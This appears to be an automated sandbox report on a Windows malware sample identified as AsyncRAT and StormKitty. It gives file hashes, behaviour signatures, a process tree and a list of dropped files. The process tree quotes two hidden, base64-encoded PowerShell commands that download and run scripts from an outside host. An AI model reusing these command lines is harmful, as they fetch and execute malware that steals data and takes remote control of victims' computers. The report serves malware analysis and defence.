Analysis

  • max time kernel
    94s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14-11-2024 11:25

General

  • Target: fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe
  • Size: 95.5MB
  • MD5: ce6f5ba448e5b85d0410c70eb68b8b7b
  • SHA1: d82919e11eeaa23997e5047d2041c5acb8c3bab5
  • SHA256: fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
  • SHA512: 1f9a82b77ae9e18d82b4c0751e114b27f1b009968644353ed2bfeb5315b8f8fcd4dee4c74b00d35bc1f76cd0bd0078014697797dfe4fd082dd54460aa7260dee
  • SSDEEP: 1536:srae78zjORCDGwfdCSog01313zAYs5gczGNuKTFP76k:0ahKyd2n31UR5MTFPJ

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool, written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with its display window hidden.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe
    "C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sora.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
          "C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
            PID:1956
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1976
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 1296
                6⤵
                • Program crash
                PID:4336
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c sorast.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1192
          • C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
            "C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4236
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3240
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1976 -ip 1976
      1⤵
      PID:4620

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: 56c43715e0e7fa58012d8a5769d8d568
    SHA1: 4370ca3436f2e3a95b47a728503a2c22a5a5fa39
    SHA256: 8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
    SHA512: b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 4fe81288ed69f286820a38e284c3e424
    SHA1: f6ed802cf562c4646f629ae6946d6fc77f39d97e
    SHA256: b0794129d82ac2c3f372bf8582d9e55e9c63b3843d6d0e9bc111d482355bdcd3
    SHA512: 8813941122dadd5b05243b94317f52285f4be468c633609fe5c2103c6ca57568631c908c11db234e45839023789403ca023b708f929eb96adca0cd7068c66afd

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat
    Filesize: 6KB
    MD5: 345718527c30710326719967e3fd4d50
    SHA1: 8f7be9c69a4e95155dd33c935f362155d91c05dc
    SHA256: ac4db954f2a68c4b12ba72dc4feb193c16b9bdc6a58d9550a9a5fb7383227bd5
    SHA512: 21bf40922a5fb96239eff6107d394cac3862b2a9068b80949bfe158a420d1588685d005c0d70ed69b7614d393b3f846d1d61e13048e9650a5087367b6f7c54f6

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat
    Filesize: 7KB
    MD5: d80437fda6ba90dd8338ca91fbcc18dc
    SHA1: 87415b5650b55ff7b2a38684768a49018e42d982
    SHA256: 81d20d2731ab795995553d20cb60a7481ae4fa27615257418489f802683b435a
    SHA512: 2ffc42e30f0a63d1b9a563ee9ec346faf26a71d4f9f3a429f35e4d95d446a2dbc6aa2bb43a37d0b8533feb02bd738e5708be49919ad27cc572175d547be07240

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42rzgt5i.h21.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\Downloads\Chromeservices\Qt5Core.dll
    Filesize: 3.2MB
    MD5: 0897cd584a6a8e39b9f2e25a2ab193e2
    SHA1: 4af09f0291c659d74e4e7f1a7e96632b3987daef
    SHA256: 8c7cda207cb9031fb126719a43bff6e2fb4b8e2ccffb3efa2b895f6092603b65
    SHA512: bfb5663756a8b18a0945e9e654256870f100de50e815dcddb86a2aed06bb85b2e5792e121b4af0560987adc40c5b9e020a5e32e1ddf4dafd29efc2aca9b9a427

  • C:\Users\Public\Downloads\Chromeservices\concrt140e.dll
    Filesize: 292KB
    MD5: 8b0e3a4d5c72ddee5866296bcb2c8185
    SHA1: d689fbf9c6fcf957243e0c3f89831cecf69eade3
    SHA256: 2d585161ec71beeaf8234163341482a06d6ee01856e058518986a59fbddeb11b
    SHA512: ca33dccc148b9acdeb1f064d6313101c8bc5daaed04f417b42a30d2bf4788e7d23b8536c0431650fbe5fcf4b44aeab3db478452390f4cb78ea42d731e8a5e198

  • C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
    Filesize: 45KB
    MD5: 25ab75a586f4b22ebae81e74b20bfee9
    SHA1: 97f52704adbbd42f1c6415f565241ba1521c450f
    SHA256: 14a4044215f341ba1ece3e49d475e309749b65c8959f2724d26209ed705a225a
    SHA512: cfa18fcccdeb95450f9ddb24dd620edca3faec765d339395884bcd2369783e37fd41ab3923a2d7439512670eb9389555dfc5a72adb725c818d2a5f4ea5154f7c

  • C:\Users\Public\Downloads\Edgeservices\Qt5Core.dll
    Filesize: 3.1MB
    MD5: d63a867c0a14584dfe04a9712c64bc0b
    SHA1: 3dc1c8e9ca93962a6d3400be3ac7d76d65f87a01
    SHA256: 60dbf8cb76cbfc6a1b6df53ea3c087eecba1bf59737a1de2a2b96475f0c912c0
    SHA512: aeebf3c911816b0b984bf78a43275575e7e1ddb61473d0bd14504316cf389da0373e78948c0ba3d54146aed95f2569987549b76a1325e0c949e2d16e038c8914

  • C:\Users\Public\Downloads\Edgeservices\VCRUNTIME140_1.dll
    Filesize: 36KB
    MD5: d8d1a08176ba2542c58669c1c04da1b7
    SHA1: e0d0059baf23fb5e1d2dadedc12e2f53c930256d
    SHA256: 26c29d01df73a8e35d32e430c892d925abb6e4ad62d3630ae42b69daacba1a0d
    SHA512: 5308790fbcf6348e87e7d5b9235ed66942527326f7ba556c910d68d94617bdd247a4ed540b4b9f8d4e73d15cf4a7204c0a57d4fd348ec26e53f39b91be8617fb

  • C:\Users\Public\Downloads\Edgeservices\concrt140e.dll
    Filesize: 2.3MB
    MD5: 22c3fc378a3c3311bb5e9082c443fbd4
    SHA1: 06c32b31de4772da425c1eebc6c8064ed4305843
    SHA256: 422172e732ebd0892d8e737c07c3a9fead044f6f0d587a2e5991c40783e03ca9
    SHA512: 4330eb482c2257a1775e1edc10753dc302042266fc012a20007c1706e31c65a67017d7eb63a1eb5e13a84b7638ddf24017c63b71e92dfd30215cc7ab7f878a4b

  • C:\Users\Public\Downloads\Edgeservices\msvcp140.dll
    Filesize: 552KB
    MD5: 29c6c243cfb1cec96b4a1008274f9600
    SHA1: c54b10ef6305cc3814c68e6c8fd6daecbb27622a
    SHA256: 44a5af24f8d5f9c50a9e5a200a0486100afb6a0e86377e2e3e622a7bbb57cb04
    SHA512: 39c34554ea7b6d433c2aecfdeff87959e625e943bf7a446ebca8e5878eaf24198c1b188359a0343fb78478f2bc8b986ca4d0e69d39bac6ff80cb901fe4f113ee

  • C:\Users\Public\Downloads\Edgeservices\vcruntime140.dll
    Filesize: 94KB
    MD5: 02794a29811ba0a78e9687a0010c37ce
    SHA1: 97b5701d18bd5e25537851614099e2ffce25d6d8
    SHA256: 1729421a22585823493d5a125cd43a470889b952a2422f48a7bc8193f5c23b0f
    SHA512: caf2a478e9c78c8e93dd2288ed98a9261fcf2b7e807df84f2e4d76f8130c2e503eb2470c947a678ac63e59d7d54f74e80e743d635428aa874ec2d06df68d0272

  • memory/1616-18-0x0000019C22560000-0x0000019C22722000-memory.dmp
    Filesize: 1.8MB
  • memory/1616-65-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp
    Filesize: 10.8MB
  • memory/1616-69-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp
    Filesize: 10.8MB
  • memory/1616-48-0x00007FFD55E23000-0x00007FFD55E25000-memory.dmp
    Filesize: 8KB
  • memory/1616-17-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp
    Filesize: 10.8MB
  • memory/1616-16-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp
    Filesize: 10.8MB
  • memory/1616-12-0x0000019C1FE00000-0x0000019C1FE22000-memory.dmp
    Filesize: 136KB
  • memory/1616-5-0x00007FFD55E23000-0x00007FFD55E25000-memory.dmp
    Filesize: 8KB
  • memory/1976-66-0x0000000000400000-0x000000000064A000-memory.dmp
    Filesize: 2.3MB
  • memory/1976-70-0x00000000059D0000-0x0000000005F74000-memory.dmp
    Filesize: 5.6MB
  • memory/1976-84-0x0000000005420000-0x0000000005486000-memory.dmp
    Filesize: 408KB
  • memory/3240-132-0x0000000000400000-0x0000000000457000-memory.dmp
    Filesize: 348KB
  • memory/3240-133-0x0000000000400000-0x0000000000457000-memory.dmp
    Filesize: 348KB